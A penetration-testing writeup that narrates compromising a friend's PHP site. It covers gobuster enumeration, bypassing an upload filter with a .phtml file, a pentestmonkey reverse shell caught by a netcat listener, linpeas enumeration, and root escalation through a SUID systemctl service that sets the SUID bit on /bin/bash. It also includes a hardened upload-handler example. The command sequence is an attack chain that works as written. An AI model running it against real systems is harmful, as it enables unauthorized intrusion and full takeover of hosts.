@hvanderlaan
Last active October 20, 2020 09:57
From security scan to rooting a box

A friend of mine created a PHP website / application and asked me to check it. So I started with some simple tests to see if I could find some nice vulnerabilities. But what I found shocked me.

The information I got

To anonymize this, the FQDN is changed to domain.tld.

Information gathering: website directories

# enumerating the directories of domain.tld (default dirbuster wordlist location)
gobuster dir -u http://domain.tld -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-> /img
-> /css
-> /js
-> /internal
-> /uploads

Points of interest

/uploads is an empty directory listing and /internal is a PHP page that allows you to upload files. This could potentially be an attack vector.

Abusing the PHP upload page

My friend isn't careless: not every file type can be uploaded. A simple test showed that .php files are rejected by this page. But not all PHP extensions are well known, so I tried to upload a file with the .phtml extension, and it succeeded.
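To show why the .phtml upload got through, here is an added illustration (not the friend's application code): an extension blocklist that only knows ".php" beside a hardened handler using an allowlist and a content check. UPLOAD_DIR, the allowed image types and the `$_FILES` field layout are assumptions.

```php
<?php
// Added example, not the friend's application. The "vulnerable" policy is a
// blocklist that only knows ".php", so "rshell.phtml" passes; the hardened
// policy uses an extension allowlist plus a content check. UPLOAD_DIR and
// the allowed image types are assumptions.

const UPLOAD_DIR = '/var/www/uploads_private/'; // assumed: outside the webroot

// Vulnerable: rejects only names ending in ".php"; other PHP-handled extensions such as .phtml pass.
function vulnerable_upload_allowed(string $name): bool
{
    return substr(strtolower($name), -4) !== '.php';
}

// Hardened: the extension must be on the allowlist AND the bytes must be the
// image type that extension claims. The client's Content-Type is not trusted.
function hardened_upload_allowed(string $name, string $tmpPath): bool
{
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return false;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    return $finfo->file($tmpPath) === $allowed[$ext];
}

// Store under a server-chosen name, outside any directory the web server will
// run PHP from; disabling PHP execution for the upload directory in the web
// server config is a second, independent layer.
function store_upload(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if (!hardened_upload_allowed($file['name'], $file['tmp_name'])) {
        return null;
    }
    $ext  = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $dest = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Compare both policies on the bypass filename from the writeup.
if (PHP_SAPI === 'cli') {
    var_dump(vulnerable_upload_allowed('rshell.phtml'));            // blocklist verdict
    var_dump(hardened_upload_allowed('rshell.phtml', '/dev/null'));  // allowlist verdict
}
```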

PHP reverse shell

The https://github.com/pentestmonkey/php-reverse-shell reverse shell is a good starting point, so I uploaded that file with the .phtml extension to the website. Please note that you need to edit this file to set the port and the callback IP address.

After the file is uploaded the game is on.

# The following shocked me, but these are the commands I ran, with comments to clarify the why

# start a netcat listener for the php reverse shell
nc -lvnp 11337

# open a browser and connect to http://domain.tld/uploads/rshell.phtml
# switch back to the terminal and whoop whoop, you've got a shell

# the php reverse shell is not the most stable shell; with python you can get a better bash shell
python -c "import pty; pty.spawn('/bin/bash')"
# Although this is much better, tab completion is even better:
# background the shell, put the local terminal in raw mode, then foreground it
# press: ctrl+z
stty raw -echo
fg

# so now we have a good shell :) let's copy over some enumeration scripts
# linpeas is my way to go: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
cat << 'EOF' > /dev/shm/linpeas.sh
......
EOF
chmod 0700 /dev/shm/linpeas.sh
cd /dev/shm
./linpeas.sh | tee report-linpeas.txt

# linpeas found a nice exploitable suid issue with /bin/systemctl.
# let's use gtfobins to see if we can use it. And yes we can.
# create an ad-hoc service that chmods /bin/bash to escalate privileges
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

# now it is time to get the privileges that we always want to have
# run bash -p to preserve the effective uid, because of the suid bit on /bin/bash
bash -p

# You've got root.